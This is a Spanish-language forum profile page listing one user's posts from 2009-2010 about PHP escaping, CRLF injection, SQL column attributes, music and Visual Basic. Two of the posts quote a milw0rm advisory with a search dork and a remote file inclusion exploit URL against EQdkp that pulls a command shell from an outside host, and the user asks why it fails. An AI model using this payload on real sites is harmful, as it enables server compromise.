elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6
41  Seguridad Informática / Nivel Web / Re: Como bypassear función str_replace()? en: 10 Marzo 2010, 19:05 pm
Como me recomendaste esa vez mejor usar htmlspecialchars con ENT_QUOTES, aún asi sí quieres joder a los h4x0rs un rato podrías revisar la variable en busca de <, >, ' y " y lanzar un mensaje de "te estoy viendo eh!" ja ja ja


y porque no usar htmlspecialchars? es nativo de php y cumple bien su función.

Ahora también hay temas relacionados con la codificación de documento como utf-7 pero eso ya es otro tema.

hay alguna diferencia si uso htmlentities("$X",ENT_QUOTES) ?? yo lo uso en lugar de htmlspecialchars  :huh:
42  Foros Generales / Foro Libre / Re: ¿Que estas escuchando? en: 20 Febrero 2010, 20:42 pm
Unos cuantos temas de una de las mejores bandas no conocidas del Peru  ::)













43  Foros Generales / Foro Libre / Re: ¿Que estas escuchando? en: 28 Enero 2010, 04:51 am
musica para deleitarse los oidos




la amo.. afortunadamente fui a a verla cuando canto en mi pais.. fue impresionante..  ;)
44  Programación / PHP / Re: No puedo enviar un email en: 7 Enero 2010, 21:18 pm
Ese code que hisiste es vulnerable a CLRF

quizas quisiste decir CRLF.. pero diiiisculpa mi ignorancia peroo....  no veo ninguna vulnerabilidad aqui, solo se va enviar un mail, aqui no se esta usando bd, ni publicando mensajes en una web.. solo se enviara un mail?? acaso juakearan el mail webmaster@example.com :xD que cosa podrian hacer con dicha vulnerabilidad que no existe??
45  Programación / PHP / Re: SignMe 2.0 - Segunda versión de mi libro de visitas en PHP en: 1 Diciembre 2009, 15:50 pm
Gracias por tu tiempo, pero si se deshabilita .js desde firefox, si se podria enviar datos en blanco  :-X mejor seria una validacion con php  ;D

Citar
* Antes se podían enviar comentarios en blanco, ahora si alguien deja en blanco el campo del comentario (bien porque se le olvidó rellenarlo o bien porque quería molestar enviando a lo tonto), no podrá, ya que le saltará una alerta ‭‬‭‬javascript instándole a que rellene el campo del comentario para poder enviar el comentario.
46  Programación / Bases de Datos / Re: Dudas con atributos a los campos de una tabla en: 1 Diciembre 2009, 15:15 pm
wow, wow, wow  muy interesante :P esto era lo que queria leer  :D
ahora mismo me cambiare a char() y ordenare cada dato con su atributo correspondiente y luego profundizare mas sobre las bd
gracias por quitarme la venda de los ojos  :-*
47  Programación / Bases de Datos / Dudas con atributos a los campos de una tabla en: 29 Noviembre 2009, 04:25 am
hola a todos, resulta que quiero saber para que fucking demonios sirve el maldito NOT NULL?? como su nombre lo dice "no nulo" se supone que no deberia aceptar campos vacio.. pero lo hace, se puede agregar campos vacios a una tabla, o mejor dicho, no agregar nada a ese campo, pero si a los demas sin problemas, alguien que me explique entonces para que sirve?? porque de adorno no luce bien  :xD

Código:
create table tablita(
id int NOT NULL,
nombre varchar(50) NOT NULL,
.........
);

y tambien decirles que a veces (miento!! esto lo hago siempre!!  :xD) yo suelo insertar datos en formato de fecha, numericos o string a determinados campos de una tabla, y por defecto a TODO lo llamo varchar no uso date, int (int solo uso para el id) u otros atributos porque hasta ahora todo trabaja bien sin problemas  :xD, pero mi pregunta es... hay alguna diferencia o punto en contra con la forma que estoy trabajando?? se que voy contra las reglas pero quiero oir criticas constructivas.. o mejor aun.. que me quiten la venda de los ojos  :D
saludos y no sean tan severos conmigo  :laugh:
48  Programación / Programación Visual Basic / Re: Ayuda CON mi proyecto en: 6 Agosto 2009, 03:08 am
quiero hacer un laucnher/actualizador pero no conozco mucho de visual basic, tambien quiero colocas imagen de fondo .png

yo quiero hacer una nave espacial que valla a saturno y vuelva en 1 dia, pero no se nada, ¿que me recomiendan?...

PD:poner titulos descriptivos en los POST...



no paro de reir  :xD
aproposito... yo si estoy aprendiendo a programar en visual basic pero visual 6 ya voy 2 dias y todo se ve facilicimo (porque tengo nociones intermedias de php) pero alguien me podria recomendar si mejor dejo visual basic 6 para ir tras visual 2005 o 2008 ?? algun master que sepa que es lo mas recomendable??
49  Seguridad Informática / Nivel Web / Re: Duda con LFI en: 6 Agosto 2009, 03:02 am

Fijate que el archivo con el cual intentas hacer la inclusión es un jpg, el servidor, aunque la imagen tenga código php , lo va a interpretar como una imagen.

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
Ves la diferencia?
Aquí te dejo un tutorial de como bypassear los filtros.

gracias por la respuesta  :D ahora si que ya voy entendiendo, leere el link que esta bueno, saludos  ;D
50  Seguridad Informática / Nivel Web / Re: Duda con LFI en: 3 Agosto 2009, 23:27 pm
disculpen que insista preguntando sobre la misma duda pero aqui encontre un ejemplo de lo que tanto comentaba (y se supone que funciona)

Citar
Title: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]

se supone que esto debe funcionar no?? o es un bug obsoleto?? o el enano milw0rm se equivoco?? (milw0rm me suena a nombre de un enano de cuentos de hadas  :xD) porque el si puede ejecutar codigo arbitrario y yo no, o tal vez la unica solucion seria cambiar mi imagen fake.jpg a fake.gif??  :D  ... aun asi tengo el mismo resultado :-[
lo encontre aqui http://www.milw0rm.com/exploits/1764
necesito una explicacion   :huh:  ;D  :rolleyes:
Páginas: 1 2 3 4 [5] 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines